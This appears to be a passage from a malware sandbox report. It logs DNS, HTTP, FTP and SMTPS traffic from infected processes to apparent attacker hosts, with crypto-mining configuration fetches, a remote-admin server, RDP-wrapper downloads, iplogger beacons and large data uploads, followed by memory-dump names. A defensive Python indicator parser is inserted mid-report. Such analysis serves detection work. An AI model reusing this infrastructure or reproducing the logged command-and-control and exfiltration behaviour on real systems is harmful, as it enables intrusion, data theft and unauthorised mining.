                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            WHOIS.AFRINIC.NET
                                                                                                                                                                                                                                                                            IN CNAME
                                                                                                                                                                                                                                                                            whois-public.AFRINIC.NET
                                                                                                                                                                                                                                                                            whois-public.AFRINIC.NET
                                                                                                                                                                                                                                                                            IN A
    196.192.115.21
    whois-public.AFRINIC.NET IN A 196.216.2.20
    whois-public.AFRINIC.NET IN A 196.216.2.21
  • DNS loders.xyz
    Remote address: 8.8.8.8:53
    Request: loders.xyz IN A
    Response: loders.xyz IN A 193.109.79.176
  • DNS dashost2.xyz
    Remote address: 8.8.8.8:53
    Request: dashost2.xyz IN A
    Response: dashost2.xyz IN A 194.147.78.109
  • GET http://dashost2.xyz/randomx/STATUS.html
    Process: audiodg.exe
    Remote address: 194.147.78.109:80
    Request:
      GET /randomx/STATUS.html HTTP/1.1
      User-Agent: AutoIt
      Host: dashost2.xyz
      Cache-Control: no-cache
    Response:
      HTTP/1.1 200 OK
      Date: Wed, 18 Nov 2020 13:41:14 GMT
      Server: Apache/2.4.25 (Debian)
      Last-Modified: Fri, 13 Nov 2020 15:15:41 GMT
      ETag: "6-5b3fe806f1e18"
      Accept-Ranges: bytes
      Content-Length: 6
      Content-Type: text/html
  • GET http://dashost2.xyz/LTC.html
    Process: audiodg.exe
    Remote address: 194.147.78.109:80
    Request:
      GET /LTC.html HTTP/1.1
      User-Agent: AutoIt
      Host: dashost2.xyz
      Cache-Control: no-cache
    Response:
      HTTP/1.1 200 OK
      Date: Wed, 18 Nov 2020 13:41:15 GMT
      Server: Apache/2.4.25 (Debian)
      Last-Modified: Tue, 22 Sep 2020 20:21:28 GMT
      ETag: "22-5afecb6476e6e"
      Accept-Ranges: bytes
      Content-Length: 34
      Content-Type: text/html
  • DNS wininit.club
    Remote address: 8.8.8.8:53
    Request: wininit.club IN A
    Response: wininit.club IN A 109.248.11.138
  • GET http://wininit.club/d/web.html
    Process: audiodg.exe
    Remote address: 109.248.11.138:80
    Request:
      GET /d/web.html HTTP/1.1
      User-Agent: AutoIt
      Host: wininit.club
      Cache-Control: no-cache
    Response:
      HTTP/1.1 200 OK
      Date: Wed, 18 Nov 2020 13:41:15 GMT
      Server: Apache/2.4.25 (Debian)
      Last-Modified: Tue, 13 Oct 2020 21:00:53 GMT
      ETag: "e-5b193b5dea71b"
      Accept-Ranges: bytes
      Content-Length: 14
      Content-Type: text/html
  • 185.175.44.167:5655
    rms-server.tektonit.ru
    rutserv.exe
    1.3kB
    407 B
    8
    7
  • 208.95.112.1:80
    http://ip-api.com/json
    http
    winit.exe
    315 B
    591 B
    5
    2
    HTTP Request: GET http://ip-api.com/json
    HTTP Response: 200
  • 194.0.200.251:465
    freemail.freehost.com.ua
    tls, smtps
    winit.exe
    4.5kB
    5.1kB
    20
                                                                                                                                                                                                                                                                            21
                                                                                                                                                                                                                                                                          • 109.248.11.138:80
                                                                                                                                                                                                                                                                            http://wininit.club/S.html
                                                                                                                                                                                                                                                                            http
                                                                                                                                                                                                                                                                            update.bin.exe
                                                                                                                                                                                                                                                                            849 B
                                                                                                                                                                                                                                                                            1.2kB
                                                                                                                                                                                                                                                                            11
                                                                                                                                                                                                                                                                            7

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://wininit.club/STATUS.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://wininit.club/L.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://wininit.club/P.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://wininit.club/S.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200
                                                                                                                                                                                                                                                                          • 109.248.11.138:80
                                                                                                                                                                                                                                                                            http://wininit.club/S.html
                                                                                                                                                                                                                                                                            http
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            891 B
                                                                                                                                                                                                                                                                            1.2kB
                                                                                                                                                                                                                                                                            12
                                                                                                                                                                                                                                                                            7

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://wininit.club/L2.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://wininit.club/L.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://wininit.club/P.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://wininit.club/S.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200
                                                                                                                                                                                                                                                                          • 185.212.148.107:80
                                                                                                                                                                                                                                                                            http://dashost.club/DOGE.html
                                                                                                                                                                                                                                                                            http
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            3.1kB
                                                                                                                                                                                                                                                                            5.1kB
                                                                                                                                                                                                                                                                            35
                                                                                                                                                                                                                                                                            19

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://dashost.club/ex20mac/STATUS.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://dashost.club/ex20mac/loaderTOP.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            404

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://dashost.club/LTC.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://dashost.club/BTC.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://dashost.club/ETH.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://dashost.club/ZEC.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://dashost.club/DOGE.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://dashost.club/ex20mac/Login.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://dashost.club/ex20mac/Password.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://dashost.club/ex20mac/Server.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200

                                                                                                                                                                                                                                                                            HTTP Request

  HTTP GET http://dashost.club/ex20mac/configCPUX.html -> 200
  HTTP GET http://dashost.club/LTC.html -> 200
  HTTP GET http://dashost.club/BTC.html -> 200
  HTTP GET http://dashost.club/ETH.html -> 200
  HTTP GET http://dashost.club/ZEC.html -> 200
  HTTP GET http://dashost.club/DOGE.html -> 200
• 45.141.184.35:21 | ftp | update.bin.exe | sent 1.3kB (26 pkts) | received 1.1kB (16 pkts)
• 45.141.184.35:12080 | update.bin.exe | sent 41.3kB (898 pkts) | received 1.3MB (897 pkts)
• 45.141.184.35:12246 | update.bin.exe | sent 512 B (11 pkts) | received 39.1kB (27 pkts)
• 45.141.184.35:21 | ftp | taskhost.exe | sent 1.3kB (26 pkts) | received 1.1kB (16 pkts)
• 45.141.184.35:12640 | taskhost.exe | sent 604 B (13 pkts) | received 45.1kB (31 pkts)
• 45.141.184.35:12214 | taskhost.exe | sent 12.2kB (266 pkts) | received 394.1kB (265 pkts)
• 185.143.145.9:80 | http://stcubegames.netxi.in/index.php | http | azur.exe | sent 149.3kB (3117 pkts) | received 4.6MB (3113 pkts)
  HTTP POST http://stcubegames.netxi.in/index.php -> 200
  HTTP POST http://stcubegames.netxi.in/index.php -> 200
• 151.101.0.133:443 | https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini | tls, http | RDPWInst.exe | sent 5.1kB (101 pkts) | received 138.3kB (97 pkts)
  HTTP GET https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini -> 200
• 88.99.66.31:443 | https://iplogger.org/1qW3y7 | tls, http | update.bin.exe | sent 992 B (10 pkts) | received 4.4kB (7 pkts)
  HTTP GET https://iplogger.org/1qW3y7 -> 200
• 151.101.0.133:443 | https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini | tls, http | RDPWInst.exe | sent 5.1kB (101 pkts) | received 138.3kB (97 pkts)
  HTTP GET https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini -> 200
• 109.248.203.91:21 | ftp | taskhost.exe | sent 438 B (9 pkts) | received 369 B (7 pkts)
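As an added example (not part of the sandbox report and not vendor tooling), a Python parser for the flattened network table in this report: it turns each per-connection record into a structured entry, pairs every HTTP request with its status code, collects the observed indicators, and ties FTP connections back to the host/port pairs from the extracted-credentials section at the top of the report. The sample input is constructed from two records of this table with the layout whitespace removed; the column order it assumes (bytes sent, bytes received, packets sent, packets received) and the 100 kB threshold used to flag large downloads over an unrecognised protocol are assumptions, not something the report states.

```python
import re
from urllib.parse import urlsplit

# Constructed sample: two records copied from the table above, whitespace
# stripped. Column order (dest, optional URL, optional proto, process, bytes
# sent, bytes received, packets sent, packets received) is an assumption.
SAMPLE = """
• 45.141.184.35:21
ftp
update.bin.exe
1.3kB
1.1kB
26
16
• 185.143.145.9:80
http://stcubegames.netxi.in/index.php
http
azur.exe
149.3kB
4.6MB
3117
3113
HTTP Request
POST http://stcubegames.netxi.in/index.php
HTTP Response
200
"""

DEST_RE = re.compile(r"^•\s*(\d{1,3}(?:\.\d{1,3}){3}):(\d+)$")
SIZE_RE = re.compile(r"^(\d+(?:\.\d+)?)\s?(B|kB|MB|GB)$")
PROTO_RE = re.compile(r"^(?:ftp|http|tls|dns|smtp)(?:,\s*(?:ftp|http|tls|dns|smtp))*$")
UNITS = {"B": 1, "kB": 10**3, "MB": 10**6, "GB": 10**9}


def parse_size(text):
    """'1.3kB' -> 1300 (the report prints decimal units)."""
    m = SIZE_RE.match(text)
    if not m:
        raise ValueError(f"not a size: {text!r}")
    return int(round(float(m.group(1)) * UNITS[m.group(2)]))


def _record(ip=None, port=None):
    return {"ip": ip, "port": port, "url": None, "proto": None,
            "process": None, "counters": [], "http": []}


def parse_network_section(text):
    """A '• ip:port' line opens a record. HTTP entries seen before the first
    bullet belong to a connection cut off above, so they land in ip=None."""
    records = [_record()]
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    i = 0
    while i < len(lines):
        ln, rec = lines[i], records[-1]
        if m := DEST_RE.match(ln):
            records.append(_record(m.group(1), int(m.group(2))))
        elif ln == "HTTP Request" and i + 1 < len(lines):
            method, _, url = lines[i + 1].partition(" ")
            status, i = None, i + 2
            # Consume the optional response here, or its bare status code
            # would be misread below as a byte/packet counter.
            if i + 1 < len(lines) and lines[i] == "HTTP Response":
                status, i = int(lines[i + 1]), i + 2
            rec["http"].append((method, url, status))
            continue
        elif ln.startswith(("http://", "https://")):
            rec["url"] = ln
        elif PROTO_RE.match(ln):
            rec["proto"] = ln
        elif ln.endswith(".exe"):
            rec["process"] = ln
        elif SIZE_RE.match(ln) or ln.isdigit():
            rec["counters"].append(parse_size(ln) if SIZE_RE.match(ln) else int(ln))
        i += 1
    for rec in records:
        c = rec.pop("counters") + [None] * 4
        rec["bytes_sent"], rec["bytes_recv"], rec["pkts_sent"], rec["pkts_recv"] = c[:4]
    return records


def extract_iocs(records):
    """Indicators grouped by type, ready for a blocklist or a hunt query."""
    iocs = {"ips": set(), "hosts": set(), "urls": set()}
    for rec in records:
        iocs["ips"].update(filter(None, [rec["ip"]]))
        for url in filter(None, [rec["url"], *(u for _, u, _ in rec["http"])]):
            iocs["urls"].add(url)
            iocs["hosts"].add(urlsplit(url).hostname)
    return iocs


def triage_findings(records, extracted_ftp):
    """Reviewer notes; `extracted_ftp` holds the (host, port) pairs from the
    report's extracted credentials so FTP traffic can be tied to its config."""
    notes = []
    for rec in (r for r in records if r["ip"]):
        if rec["proto"] == "ftp" or rec["port"] == 21:
            tied = (rec["ip"], rec["port"]) in extracted_ftp
            notes.append(f"cleartext FTP {rec['ip']}:{rec['port']} by {rec['process']} "
                         f"({'matches' if tied else 'does not match'} extracted config)")
        if rec["proto"] is None and (rec["bytes_recv"] or 0) > 100_000:  # assumed threshold
            notes.append(f"{rec['process']} received {rec['bytes_recv']} bytes from "
                         f"{rec['ip']}:{rec['port']} over an unrecognised protocol")
        notes += [f"{rec['process']} {m} {u} -> {s}" for m, u, s in rec["http"] if m == "POST"]
    return notes
```

The FTP check is the one worth keeping in a real pipeline: the configs at the top of this report carry FTP credentials for 45.141.184.35 and 109.248.203.91 on port 21, and the table shows both update.bin.exe and taskhost.exe talking to those host/port pairs, so the credential and the traffic corroborate each other. A record with no recognised protocol but a large inbound byte count (the 45.141.184.35:12080 connection above) is where a second-stage payload would be, which is why the parser keeps the raw counters rather than only the protocol label.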
• 109.248.11.161:35253 | http://109.248.11.161:35253/IRemotePanel | http | system.exe | sent 3.5MB (2350 pkts) | received 19.9kB (449 pkts)

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            POST http://109.248.11.161:35253/IRemotePanel

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            POST http://109.248.11.161:35253/IRemotePanel

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            POST http://109.248.11.161:35253/IRemotePanel

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200
                                                                                                                                                                                                                                                                          • 109.248.203.91:21
                                                                                                                                                                                                                                                                            ftp
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            438 B
                                                                                                                                                                                                                                                                            329 B
                                                                                                                                                                                                                                                                            9
                                                                                                                                                                                                                                                                            6
                                                                                                                                                                                                                                                                          • 104.26.12.31:443
                                                                                                                                                                                                                                                                            https://api.ip.sb/geoip
                                                                                                                                                                                                                                                                            tls, http
                                                                                                                                                                                                                                                                            system.exe
                                                                                                                                                                                                                                                                            707 B
                                                                                                                                                                                                                                                                            4.3kB
                                                                                                                                                                                                                                                                            8
                                                                                                                                                                                                                                                                            8

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET https://api.ip.sb/geoip

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200
                                                                                                                                                                                                                                                                          • 88.99.66.31:443
                                                                                                                                                                                                                                                                            https://iplogger.org/1B2Cw7
                                                                                                                                                                                                                                                                            tls, http
                                                                                                                                                                                                                                                                            utorrent.exe
                                                                                                                                                                                                                                                                            1.0kB
                                                                                                                                                                                                                                                                            4.4kB
                                                                                                                                                                                                                                                                            11
                                                                                                                                                                                                                                                                            7

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET https://iplogger.org/1B2Cw7

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200
                                                                                                                                                                                                                                                                          • 52.206.184.85:80
                                                                                                                                                                                                                                                                            http://checkip.amazonaws.com/
                                                                                                                                                                                                                                                                            http
                                                                                                                                                                                                                                                                            system.exe
                                                                                                                                                                                                                                                                            301 B
                                                                                                                                                                                                                                                                            262 B
                                                                                                                                                                                                                                                                            5
                                                                                                                                                                                                                                                                            3

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://checkip.amazonaws.com/

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200
                                                                                                                                                                                                                                                                          • 109.248.203.91:21
                                                                                                                                                                                                                                                                            ftp
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            1.3kB
                                                                                                                                                                                                                                                                            1.1kB
                                                                                                                                                                                                                                                                            27
                                                                                                                                                                                                                                                                            15
                                                                                                                                                                                                                                                                          • 192.0.32.59:43
                                                                                                                                                                                                                                                                            whois.iana.org
                                                                                                                                                                                                                                                                            system.exe
                                                                                                                                                                                                                                                                            244 B
                                                                                                                                                                                                                                                                            492 B
                                                                                                                                                                                                                                                                            5
                                                                                                                                                                                                                                                                            4
                                                                                                                                                                                                                                                                          • 109.248.203.91:62675
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            604 B
                                                                                                                                                                                                                                                                            45.1kB
                                                                                                                                                                                                                                                                            13
                                                                                                                                                                                                                                                                            31
                                                                                                                                                                                                                                                                          • 196.192.115.21:43
                                                                                                                                                                                                                                                                            WHOIS.AFRINIC.NET
                                                                                                                                                                                                                                                                            system.exe
                                                                                                                                                                                                                                                                            336 B
                                                                                                                                                                                                                                                                            2.6kB
                                                                                                                                                                                                                                                                            7
                                                                                                                                                                                                                                                                            6
                                                                                                                                                                                                                                                                          • 109.248.203.91:61759
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            37.7kB
                                                                                                                                                                                                                                                                            1.2MB
                                                                                                                                                                                                                                                                            820
                                                                                                                                                                                                                                                                            819
                                                                                                                                                                                                                                                                          • 109.248.203.91:21
                                                                                                                                                                                                                                                                            ftp
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            788 B
                                                                                                                                                                                                                                                                            778 B
                                                                                                                                                                                                                                                                            16
                                                                                                                                                                                                                                                                            12
                                                                                                                                                                                                                                                                          • 178.237.33.50:80
                                                                                                                                                                                                                                                                            http://www.geoplugin.net/json.gp?ip=154.61.71.51
                                                                                                                                                                                                                                                                            http
                                                                                                                                                                                                                                                                            system.exe
                                                                                                                                                                                                                                                                            366 B
(preceding flow, continued)  received 1.3kB, 6 packets sent, 4 received
    HTTP Request: GET http://www.geoplugin.net/json.gp?ip=154.61.71.51
    HTTP Response: 200
• 192.0.32.59:43  whois.iana.org  system.exe  sent 244 B / 5 pkts, received 492 B / 4 pkts
• 109.248.203.91:60088  taskhost.exe  sent 190 B / 4 pkts, received 18.1kB / 13 pkts
• 196.192.115.21:43  WHOIS.AFRINIC.NET  system.exe  sent 336 B / 7 pkts, received 2.6kB / 6 pkts
• 109.248.203.91:21  ftp  taskhost.exe  sent 778 B / 16 pkts, received 692 B / 10 pkts
• 109.248.203.91:52502  taskhost.exe  sent 282 B / 6 pkts, received 24.1kB / 17 pkts
• 193.109.79.176:3333  loders.xyz  MicrosoftHost.exe  sent 647 B / 4 pkts, received 580 B / 3 pkts
• 194.147.78.109:80  http://dashost2.xyz/LTC.html  http  audiodg.exe  sent 463 B / 6 pkts, received 664 B / 4 pkts
    HTTP Request: GET http://dashost2.xyz/randomx/STATUS.html
    HTTP Response: 200
    HTTP Request: GET http://dashost2.xyz/LTC.html
    HTTP Response: 200
• 109.248.11.138:80  http://wininit.club/d/web.html  http  audiodg.exe  sent 277 B / 4 pkts, received 372 B / 3 pkts
    HTTP Request: GET http://wininit.club/d/web.html
    HTTP Response: 200
• 8.8.8.8:53  rms-server.tektonit.ru  dns  sent 68 B / 1 pkt, received 84 B / 1 pkt
    DNS Request: rms-server.tektonit.ru
    DNS Response: 185.175.44.167
• 8.8.8.8:53  ip-api.com  dns  sent 56 B / 1 pkt, received 72 B / 1 pkt
    DNS Request: ip-api.com
    DNS Response: 208.95.112.1
• 8.8.8.8:53  freemail.freehost.com.ua  dns  sent 70 B / 1 pkt, received 86 B / 1 pkt
    DNS Request: freemail.freehost.com.ua
    DNS Response: 194.0.200.251
• 8.8.8.8:53  wininit.club  dns  sent 58 B / 1 pkt, received 74 B / 1 pkt
    DNS Request: wininit.club
    DNS Response: 109.248.11.138
• 8.8.8.8:53  wininit.club  dns  sent 58 B / 1 pkt, received 74 B / 1 pkt
    DNS Request: wininit.club
    DNS Response: 109.248.11.138

                                                                                                                                                                                                                                                                          • 8.8.8.8:53
                                                                                                                                                                                                                                                                            dashost.club
                                                                                                                                                                                                                                                                            dns
                                                                                                                                                                                                                                                                            58 B
                                                                                                                                                                                                                                                                            74 B
                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            1

                                                                                                                                                                                                                                                                            DNS Request

                                                                                                                                                                                                                                                                            dashost.club

                                                                                                                                                                                                                                                                            DNS Response

                                                                                                                                                                                                                                                                            185.212.148.107

                                                                                                                                                                                                                                                                          • 8.8.8.8:53
                                                                                                                                                                                                                                                                            stcubegames.netxi.in
                                                                                                                                                                                                                                                                            dns
                                                                                                                                                                                                                                                                            66 B
                                                                                                                                                                                                                                                                            82 B
                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            1

                                                                                                                                                                                                                                                                            DNS Request

                                                                                                                                                                                                                                                                            stcubegames.netxi.in

                                                                                                                                                                                                                                                                            DNS Response

                                                                                                                                                                                                                                                                            185.143.145.9

                                                                                                                                                                                                                                                                          • 8.8.8.8:53
                                                                                                                                                                                                                                                                            raw.githubusercontent.com
                                                                                                                                                                                                                                                                            dns
                                                                                                                                                                                                                                                                            71 B
                                                                                                                                                                                                                                                                            170 B
                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            1

                                                                                                                                                                                                                                                                            DNS Request

                                                                                                                                                                                                                                                                            raw.githubusercontent.com

                                                                                                                                                                                                                                                                            DNS Response

                                                                                                                                                                                                                                                                            151.101.0.133
                                                                                                                                                                                                                                                                            151.101.64.133
                                                                                                                                                                                                                                                                            151.101.128.133
                                                                                                                                                                                                                                                                            151.101.192.133

                                                                                                                                                                                                                                                                          • 8.8.8.8:53
                                                                                                                                                                                                                                                                            iplogger.org
                                                                                                                                                                                                                                                                            dns
                                                                                                                                                                                                                                                                            58 B
                                                                                                                                                                                                                                                                            74 B
                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            1

                                                                                                                                                                                                                                                                            DNS Request

                                                                                                                                                                                                                                                                            iplogger.org

                                                                                                                                                                                                                                                                            DNS Response

                                                                                                                                                                                                                                                                            88.99.66.31

                                                                                                                                                                                                                                                                          • 8.8.8.8:53
                                                                                                                                                                                                                                                                            raw.githubusercontent.com
                                                                                                                                                                                                                                                                            dns
                                                                                                                                                                                                                                                                            71 B
                                                                                                                                                                                                                                                                            170 B
                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            1

                                                                                                                                                                                                                                                                            DNS Request

                                                                                                                                                                                                                                                                            raw.githubusercontent.com

                                                                                                                                                                                                                                                                            DNS Response

                                                                                                                                                                                                                                                                            151.101.0.133
                                                                                                                                                                                                                                                                            151.101.64.133
                                                                                                                                                                                                                                                                            151.101.128.133
                                                                                                                                                                                                                                                                            151.101.192.133

                                                                                                                                                                                                                                                                          • 8.8.8.8:53
                                                                                                                                                                                                                                                                            api.ip.sb
                                                                                                                                                                                                                                                                            dns
                                                                                                                                                                                                                                                                            55 B
                                                                                                                                                                                                                                                                            145 B
                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            1

                                                                                                                                                                                                                                                                            DNS Request

                                                                                                                                                                                                                                                                            api.ip.sb

                                                                                                                                                                                                                                                                            DNS Response

                                                                                                                                                                                                                                                                            104.26.12.31
                                                                                                                                                                                                                                                                            172.67.75.172
                                                                                                                                                                                                                                                                            104.26.13.31

                                                                                                                                                                                                                                                                          • 8.8.8.8:53
                                                                                                                                                                                                                                                                            checkip.amazonaws.com
                                                                                                                                                                                                                                                                            dns
                                                                                                                                                                                                                                                                            67 B
                                                                                                                                                                                                                                                                            271 B
                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            1

                                                                                                                                                                                                                                                                            DNS Request

                                                                                                                                                                                                                                                                            checkip.amazonaws.com

                                                                                                                                                                                                                                                                            DNS Response

                                                                                                                                                                                                                                                                            52.206.184.85
                                                                                                                                                                                                                                                                            34.200.69.241
                                                                                                                                                                                                                                                                            107.21.162.206
                                                                                                                                                                                                                                                                            18.209.89.50
                                                                                                                                                                                                                                                                            52.20.197.7
                                                                                                                                                                                                                                                                            52.204.109.97
                                                                                                                                                                                                                                                                            23.21.27.29
                                                                                                                                                                                                                                                                            3.222.126.94

                                                                                                                                                                                                                                                                          • 8.8.8.8:53
                                                                                                                                                                                                                                                                            iplogger.org
                                                                                                                                                                                                                                                                            dns
                                                                                                                                                                                                                                                                            58 B
                                                                                                                                                                                                                                                                            74 B
                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            1

                                                                                                                                                                                                                                                                            DNS Request

                                                                                                                                                                                                                                                                            iplogger.org

DNS Response: 88.99.66.31

• 8.8.8.8:53  whois.iana.org  dns  60 B  110 B  1  1
  DNS Request: whois.iana.org
  DNS Response: 192.0.32.59

• 8.8.8.8:53  WHOIS.AFRINIC.NET  dns  63 B  138 B  1  1
  DNS Request: WHOIS.AFRINIC.NET
  DNS Response: 196.192.115.21, 196.216.2.20, 196.216.2.21

• 8.8.8.8:53  www.geoplugin.net  dns  63 B  93 B  1  1
  DNS Request: www.geoplugin.net
  DNS Response: 178.237.33.50

• 8.8.8.8:53  whois.iana.org  dns  60 B  110 B  1  1
  DNS Request: whois.iana.org
  DNS Response: 192.0.32.59

• 8.8.8.8:53  WHOIS.AFRINIC.NET  dns  63 B  138 B  1  1
  DNS Request: WHOIS.AFRINIC.NET
  DNS Response: 196.192.115.21, 196.216.2.20, 196.216.2.21

• 8.8.8.8:53  loders.xyz  dns  56 B  72 B  1  1
  DNS Request: loders.xyz
  DNS Response: 193.109.79.176

• 8.8.8.8:53  dashost2.xyz  dns  58 B  74 B  1  1
  DNS Request: dashost2.xyz
  DNS Response: 194.147.78.109

• 8.8.8.8:53  wininit.club  dns  58 B  74 B  1  1
  DNS Request: wininit.club
  DNS Response: 109.248.11.138

MITRE ATT&CK Enterprise v6

Downloads

• memory/3312-31-0x0000000003720000-0x0000000003721000-memory.dmp  Filesize: 4KB
• memory/3312-32-0x0000000002F20000-0x0000000002F21000-memory.dmp  Filesize: 4KB
• memory/3312-30-0x0000000002F20000-0x0000000002F21000-memory.dmp  Filesize: 4KB
• memory/3312-33-0x0000000003720000-0x0000000003721000-memory.dmp  Filesize: 4KB
• memory/4640-520-0x00007FF618460000-0x00007FF618A00000-memory.dmp  Filesize: 5.6MB
• memory/4988-488-0x00000000059F0000-0x00000000059F1000-memory.dmp  Filesize: 4KB
• memory/4988-483-0x0000000005210000-0x0000000005211000-memory.dmp  Filesize: 4KB
• memory/4988-489-0x0000000005F90000-0x0000000005F91000-memory.dmp  Filesize: 4KB
• memory/4988-490-0x0000000006660000-0x0000000006661000-memory.dmp  Filesize: 4KB
• memory/4988-491-0x0000000006D60000-0x0000000006D61000-memory.dmp  Filesize: 4KB
• memory/4988-486-0x0000000004B80000-0x0000000004B81000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4988-478-0x0000000000330000-0x0000000000331000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4988-485-0x0000000004C00000-0x0000000004C01000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4988-487-0x0000000004E60000-0x0000000004E61000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4988-475-0x0000000071C30000-0x000000007231E000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            6.9MB

                                                                                                                                                                                                                                                                          • memory/4988-501-0x00000000068A0000-0x00000000068A1000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4988-484-0x0000000004B60000-0x0000000004B61000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4988-507-0x00000000080D0000-0x00000000080D1000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4988-504-0x0000000007390000-0x0000000007391000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB
